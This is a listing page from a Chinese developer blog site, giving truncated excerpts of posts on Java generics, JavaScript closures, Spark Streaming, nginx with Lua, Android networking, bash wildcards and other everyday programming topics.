    http://www.cnblogs.com/xdp-gacl/p/4002804.html @Anthor:孤傲苍狼 数据库连接池 用MySQLv5版本的数据库驱动没有问题,使用MySQLv6和Oracle的数据库驱动时候报如下错误: java.lang.ClassCastException: $Proxy0 cannot be cast to java.sql.Connec
  • java泛型 百合不是茶 java泛型
    泛型 在Java SE 1.5之前,没有泛型的情况的下,通过对类型Object的引用来实现参数的“任意化”,任意化的缺点就是要实行强制转换,这种强制转换可能会带来不安全的隐患   泛型的特点:消除强制转换 确保类型安全 向后兼容   简单泛型的定义:      泛型:就是在类中将其模糊化,在创建对象的时候再具体定义 class fan
  • javascript闭包[两个小测试例子] bijian1013 JavaScriptJavaScript
    一.程序一 <script> var name = "The Window"; var Object_a = {   name : "My Object",   getNameFunc : function(){ var that = this;     return function(){     
  • 探索JUnit4扩展:假设机制(Assumption) bijian1013 javaAssumptionJUnit单元测试
    一.假设机制(Assumption)概述        理想情况下,写测试用例的开发人员可以明确的知道所有导致他们所写的测试用例不通过的地方,但是有的时候,这些导致测试用例不通过的地方并不是很容易的被发现,可能隐藏得很深,从而导致开发人员在写测试用例时很难预测到这些因素,而且往往这些因素并不是开发人员当初设计测试用例时真正目的,
  • 【Gson四】范型POJO的反序列化 bit1129 POJO
    在下面这个例子中,POJO(Data类)是一个范型类,在Tests中,指定范型类为PieceData,POJO初始化完成后,通过 String str = new Gson().toJson(data); 得到范型化的POJO序列化得到的JSON串,然后将这个JSON串反序列化为POJO   import com.google.gson.Gson; import java.
  • 【Spark八十五】Spark Streaming分析结果落地到MySQL bit1129 Stream
    几点总结: 1. DStream.foreachRDD是一个Output Operation,类似于RDD的action,会触发Job的提交。DStream.foreachRDD是数据落地很常用的方法 2. 获取MySQL Connection的操作应该放在foreachRDD的参数(是一个RDD[T]=>Unit的函数类型),这样,当foreachRDD方法在每个Worker上执行时,
  • NGINX + LUA实现复杂的控制 ronin47 nginx lua
    安装lua_nginx_module 模块 lua_nginx_module 可以一步步的安装,也可以直接用淘宝的OpenResty Centos和debian的安装就简单了。。 这里说下freebsd的安装: fetch http://www.lua.org/ftp/lua-5.1.4.tar.gz tar zxvf lua-5.1.4.tar.gz cd lua-5.1.4 ma
  • java-递归判断数组是否升序 bylijinnan java
    public class IsAccendListRecursive { /*递归判断数组是否升序 * if a Integer array is ascending,return true * use recursion */ public static void main(String[] args){ IsAccendListRecursiv
  • Netty源码学习-DefaultChannelPipeline2 bylijinnan javanetty
    Netty3的API http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/ChannelPipeline.html 里面提到ChannelPipeline的一个“pitfall”: 如果ChannelPipeline只有一个handler(假设为handlerA)且希望用另一handler(假设为handlerB) 来
  • Java工具之JPS chinrui java
    JPS使用     熟悉Linux的朋友们都知道,Linux下有一个常用的命令叫做ps(Process Status),是用来查看Linux环境下进程信息的。同样的,在Java Virtual Machine里面也提供了类似的工具供广大Java开发人员使用,它就是jps(Java Process Status),它可以用来
  • window.print分页打印 ctrain window
    function init() { var tt = document.getElementById("tt"); var childNodes = tt.childNodes[0].childNodes; var level = 0; for (var i = 0; i < childNodes.length; i++) {
  • 安装hadoop时 执行jps命令Error occurred during initialization of VM daizj jdkhadoopjps
    在安装hadoop时,执行JPS出现下面错误   [slave16][email protected]:/tmp/hsperfdata_hdfs# jps Error occurred during initialization of VM java.lang.Error: Properties init: Could not determine current working
  • PHP开发大型项目的一点经验 dcj3sjt126com PHP重构
    一、变量 最好是把所有的变量存储在一个数组中,这样在程序的开发中可以带来很多的方便,特别是当程序很大的时候。变量的命名就当适合自己的习惯,不管是用拼音还是英语,至少应当有一定的意义,以便适合记忆。变量的命名尽量规范化,不要与PHP中的关键字相冲突。 二、函数 PHP自带了很多函数,这给我们程序的编写带来了很多的方便。当然,在大型程序中我们往往自己要定义许多个函数,几十
  • android笔记之--向网络发送GET/POST请求参数 dcj3sjt126com android
    使用GET方法发送请求 private static boolean sendGETRequest (String path, Map<String, String> params) throws Exception{ //发送地http://192.168.100.91:8080/videoServi
  • linux复习笔记 之bash shell (3) 通配符 eksliang linux 通配符linux通配符
    转载请出自出处: http://eksliang.iteye.com/blog/2104387 在bash的操作环境中有一个非常有用的功能,那就是通配符。 下面列出一些常用的通配符,如下表所示 符号 意义 * 万用字符,代表0个到无穷个任意字符 ? 万用字符,代表一定有一个任意字符 [] 代表一定有一个在中括号内的字符。例如:[abcd]代表一定有一个字符,可能是a、b、c
  • Android关于短信加密 gqdy365 android
    关于Android短信加密功能,我初步了解的如下(只在Android应用层试验):     1、因为Android有短信收发接口,可以调用接口完成短信收发;         发送过程:APP(基于短信应用修改)接受用户输入号码、内容——>APP对短信内容加密——>调用短信发送方法Sm
  • asp.net在网站根目录下创建文件夹 hvt .netC#hovertreeasp.netWeb Forms
    假设要在asp.net网站的根目录下建立文件夹hovertree,C#代码如下: string m_keleyiFolderName = Server.MapPath("/hovertree"); if (Directory.Exists(m_keleyiFolderName)) { //文件夹已经存在 return; } else { try { D
  • 一个合格的程序员应该读过哪些书 justjavac 程序员书籍
    编者按:2008年8月4日,StackOverflow 网友 Bert F 发帖提问:哪本最具影响力的书,是每个程序员都应该读的? “如果能时光倒流,回到过去,作为一个开发人员,你可以告诉自己在职业生涯初期应该读一本, 你会选择哪本书呢?我希望这个书单列表内容丰富,可以涵盖很多东西。” 很多程序员响应,他们在推荐时也写下自己的评语。 以前就有国内网友介绍这个程序员书单,不过都是推荐数
  • 单实例实践 跑龙套_az 单例
       1、内部类 public class Singleton { private static class SingletonHolder { public static Singleton singleton = new Singleton(); } public Singleton getRes
  • PO VO BEAN 理解 q137681467 VODTOpo
    PO:      全称是 persistant object持久对象 最形象的理解就是一个PO就是数据库中的一条记录。 好处是可以把一条记录作为一个对象处理,可以方便的转为其它对象。     BO:     全称是 business object:业务对象 主要作用是把业务逻辑封装为一个对象。这个对
  • 战胜惰性,暗自努力 金笛子 努力
    偶然看到一句很贴近生活的话:“别人都在你看不到的地方暗自努力,在你看得到的地方,他们也和你一样显得吊儿郎当,和你一样会抱怨,而只有你自己相信这些都是真的,最后也只有你一人继续不思进取。”很多句子总在不经意中就会戳中一部分人的软肋,我想我们每个人的周围总是有那么些表现得“吊儿郎当”的存在,是否你就真的相信他们如此不思进取,而开始放松了对自己的要求随波逐流呢? 我有个朋友是搞技术的,平时嘻嘻哈哈,以
  • NDK/JNI二维数组多维数组传递 wenzongliang 二维数组jniNDK
    多维数组和对象数组一样处理,例如二维数组里的每个元素还是一个数组 用jArray表示,直到数组变为一维的,且里面元素为基本类型,去获得一维数组指针。给大家提供个例子。已经测试通过。 Java_cn_wzl_FiveChessView_checkWin( JNIEnv* env,jobject thiz,jobjectArray qizidata) { jint i,j; int s
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他